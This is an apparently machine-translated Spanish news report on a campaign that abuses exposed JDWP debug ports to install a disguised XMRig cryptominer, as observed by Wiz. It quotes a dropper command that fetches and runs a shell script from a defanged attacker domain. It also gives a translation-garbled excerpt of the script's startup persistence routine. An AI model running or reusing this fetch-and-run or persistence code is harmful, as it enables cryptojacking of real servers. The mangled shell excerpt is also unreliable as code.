Una nueva ola de ataques cibernéticos está dirigido a organizaciones que inadvertidamente exponen los servidores del Protocolo de cable de depuración de Java (JDWP) a Internet, con atacantes aprovechando este punto de entrada pasado por alto para desplegar malware criptominente sofisticado.
JDWP, una característica estándar en la plataforma Java, está diseñada para facilitar la depuración remota al permitir a los desarrolladores inspeccionar las aplicaciones en vivo.
Sin embargo, cuando JDWP se deja accesible en los sistemas de producción, a menudo debido a la configuración errónea o al uso de banderas de desarrollo en entornos en vivo, se convierte en un vector potente para la ejecución de código remoto.
La aparición de esta amenaza ha sido marcada por los rápidos ciclos de explotación. En varios incidentes observados, los atacantes pudieron comprometer máquinas vulnerables a las pocas horas de la exposición.
El flujo de ataque generalmente comienza con escaneos de Internet masivos para puertos JDWP abiertos, más comúnmente puerto 5005. Una vez que se identifica un objetivo, el atacante inicia un apretón de manos JDWP para confirmar que el servicio está activo y luego establece una sesión, ganando acceso interactivo a la máquina virtual Java (JVM).
Este acceso permite al adversario enumerar las clases cargadas e invocar métodos, lo que en última instancia permite la ejecución de comandos arbitrarios en el host.
Analistas de Wiz identificado Esta campaña después de observar los intentos de explotación contra sus servidores Honeypot que ejecuta TeamCity, una popular herramienta de CI/CD.
Los atacantes demostraron un alto grado de automatización y personalización, implementando un XMRIG cryptominer modificado con una configuración codificada para evadir la detección.
Flujo de ataque
En particular, el malware utilizó proxies de piscinas mineras para oscurecer la dirección de la billetera de destino, lo que complica los esfuerzos para rastrear o interrumpir la operación de minería ilícita.
El impacto de estos ataques es significativo. Al abusar de JDWP, los actores de amenaza no solo pueden implementar criptominadores, sino también establecer una persistencia profunda, manipular los procesos del sistema y potencialmente pivotar a otros activos dentro del entorno comprometido.
La naturaleza sigilosa de la carga útil, combinada con su capacidad para combinarse con los servicios de sistemas legítimos, aumenta el riesgo de actividad no detectada prolongada y drenaje de recursos.
Centrándose en el mecanismo de infección, los atacantes explotan la falta de autenticación de JDWP para inyectar y ejecutar comandos de Shell directamente a través del protocolo.
Después de establecer una sesión, generalmente descargan un script de cuentagotas, como logService.sh, utilizando comandos como:-
curl -o /tmp/logservice.sh -s https: // canonicalconnect (.) com/logservice.sh bash /tmp/logservice.sh
Este script está diseñado para matar a los mineros competidores, descargar el binario XMRIG malicioso disfrazado de logrotado e instalarlo en el directorio de configuración del usuario.
Luego, el script establece múltiples mecanismos de persistencia, incluida la modificación de archivos de inicio de shell, la creación de trabajos cron e instalación de un servicio de sistema falso.
El siguiente extracto ilustra cómo el script garantiza la persistencia a través de la configuración del shell:-
add_to_startup () {if (-r “$ 1”); entonces si! GREP -FXQ “$ ejecut>/dev/null 2> & 1” “$ 1”; luego echo “$ exec>/dev/null 2> y 1” >> “$ 1” fi} cadena de infección (fuente – wiz)
La cadena de infección es eficiente y resistente, lo que permite que el Cryptominer sobreviva a los reinicios y los inicios de sesión del usuario.
El uso de los atacantes de los nombres de procesos y las ubicaciones de los sistemas que suena legítimamente complica aún más los esfuerzos de detección y remediación, subrayando la necesidad de una gestión de configuración vigilante y un monitoreo sólido de los servicios expuestos.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Prueba cualquiera.
